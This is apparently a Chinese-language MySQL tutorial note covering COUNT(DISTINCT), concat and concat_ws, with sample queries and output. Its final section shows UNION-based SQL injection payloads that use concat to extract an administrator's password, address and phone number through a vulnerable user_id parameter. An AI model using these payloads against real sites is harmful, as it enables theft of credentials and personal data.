语法：

COUNT(DISTINCT expr ,[expr ...])

函数使用说明：返回不同的非NULL 值数目。若找不到匹配的项，则COUNT(DISTINCT) 返回 0

 

Mysql的查询结果行字段拼接，可以用下面两个函数实现：

1. concat函数

mysql> select concat('1','2','3') from test ;  +---------------------+  | concat('1','2','3') |  +---------------------+  | 123 |  +---------------------+

如果连接串中存在NULL，则返回结果为NULL：

mysql> select concat('1','2',NULL,'3') from test ;  +--------------------------+  | concat('1','2',NULL,'3') |  +--------------------------+  | NULL |  +--------------------------+

2. concat_ws函数

concat(separator,str1,str2,...) 代表 concat with separator ，是concat()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串，也可以是其它参数。

mysql> select concat_ws(':','1','2','3') from test ;  +----------------------------+  | concat_ws(':','1','2','3') |  +----------------------------+  | 1:2:3 |  +----------------------------+

分隔符为NULL，则返回结果为NULL：

mysql> select concat_ws(NULL,'1','2','3') from test;   +-----------------------------+  | concat_ws(NULL,'1','2','3') |  +-----------------------------+  | NULL |   +-----------------------------+

如果参数中存在NULL，则会被忽略：

mysql> select concat_ws(':','1','2',NULL,NULL,NULL,'3') from test ;  +-------------------------------------------+  | concat_ws(':','1','2',NULL,NULL,NULL,'3') |  +-------------------------------------------+  | 1:2:3 |  +-------------------------------------------+

可以对NULL进行判断，并用其它值进行替换：

mysql>  select concat_ws(':','1','2',ifNULL(NULL,'0'),'3') from bank limit 1;    +---------------------------------------------+  | concat_ws(':','1','2',ifNULL(NULL,'0'),'3') |  +---------------------------------------------+  | 1:2:0:3                                     |   +---------------------------------------------+

 

concat的SQL注入：

select username,email,content from test_table where user_id=uid;

上面的user_id是接收输入的。

 

concat函数本来是这样用的SELECT CONCAT('My', 'S', 'QL');执行结果是'MySQL'。也就是连接作用的。我们利用它来为我们服务，

uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理员id;

这个语句实际查询了六个字段，但是显示的时候，把password,sex,address,telephone等字段合在一起，显示在原本应该显示email的地方。

 

更好的方法：中间用分隔符分开：

uid=-1 union select username ,concat(password,0×3a,sex,0×3a,address,0×3a,telephone) ,content from test_talbe where user_id=管理员id;

其中0×3a是“:”的十六进 制形式。